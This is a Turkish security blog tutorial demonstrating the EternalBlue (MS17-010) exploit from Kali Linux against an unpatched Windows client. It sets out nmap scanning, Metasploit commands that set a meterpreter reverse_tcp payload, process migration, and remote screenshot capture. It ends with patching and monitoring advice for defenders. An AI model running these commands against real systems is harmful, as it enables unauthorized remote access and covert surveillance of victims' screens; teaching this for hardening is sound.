volkan demirci Security

Kali Metasploit ile Ekran Görüntüsü Alma

Kali Metasploit Screen Capturing

Bu makale, kullanmakta olduğunuz sistemleri (Server/Client) güncel tutmanız ve security hardening yapmanız için yayınlanmıştır. Bu bilgileri yasa dışı bir faaliyet amacıyla kullanmayınız.

Kali Linux “eternalblue” exploit’i kullanarak güncel olmayan (eksik update’li) Windows İşletim Sistemleri’nden ekran görüntüsü (screenshot) alacağım.

Yöntem: Wanacry MS17-010 SMB1 445/TCP

Kali IP Adres: 1.1.1.3

Windows Client IP Adres: 1.1.1.4 (Hedef PC)

Kali Linux’te oturum açıyorum.

Hedef bilgisayarın zafiyetlerini görebilmek için NMAP tool’unu kullanacağım.

Nmap ile hedef bilgisayara ulaşabilirliğimi kontrol edilyorum.

Ping 1.1.1.4

Nmap 1.1.1.4 komutunu kullanıyorum ve hedef bilgisayarda erişebileceğim port’ları görebiliyorum.

445/tcp Microsoft-ds port’unu kullanacağım.

MS17-010 update’inin hedef bilgisayar da kontrolünü aşağıdaki komut ile yapıyorum.

Nmap -p445 –script smb-vuln-ms17-010 1.1.1.4

Komutumuzun çalışması sonucunda MS17-010 açığının olduğunu tespit ediyorum. Hedef bilgisayar da windows güncellemelerinin tam olarak yapılmadığını göryorum

Bu aşamada Vulnerability Analiz aşamasını tamamlamış oluyoruz ve Metaspolit ile Sızma Testi aşamasına geçiyoruz.

Metaspolit aşağıdaki gibi çalıştırılır.

Aşağıdaki komutlar kullanılarak sızma testine devam ediyorum.

Use exploit/windows/smb/ms17_010_eternalblue

Set payload windows/x64/meterpreter/reverse_tcp

Set rhost 1.1.1.4

Set lhost 1.1.1.3

Show Options komutu kullanarak girilen bilgileri kontrol ediyorum.

Exploit yada Run komutu kullanılarak hedef sisteme erişim sağlıyorum.

Sysinfo komutu ile hedef system hakkında bilgileri görebiliyorum.

Meterpreter’da PS komutu kullanarak bağlandığım makinanın process list’ini görüyorum.

Explorer.exe’nin PID numarasını alarak “Migrate 1336” komutunu kullanıyorum.

“Use espia” komutunu kullanıuorum.

“screengrab” komutunu kullanıyorum ve remote makina’nın ekran görüntüsünüğ alıyorum.



Tekrar görüntü almak için komutu tekrar çalıştırıyorum. “SCREENGRAB”

N O T: Kesinlikle bilgisayarlarımızı güncel tutmalıyız, Windows güncellemelerini zamanın da ve tam olarak yapmalıyız . Ayrıca bilgisayarımız da bulunan tüm uygulamalarında güncellemelerini yapmalıyız.

——————————————————————————————————————————–

  1. ATA yada Azure ATP kullanınız.
  2. PAW (high secure workstation) kullanınız.
  3. Anti virüs + EDR + Malware Detection kullanınız.
  4. Aduit Log’ların doğru konfigüre edildiğinden ve aktif olduğundan emin olunuz.

———————————————————————————————————————————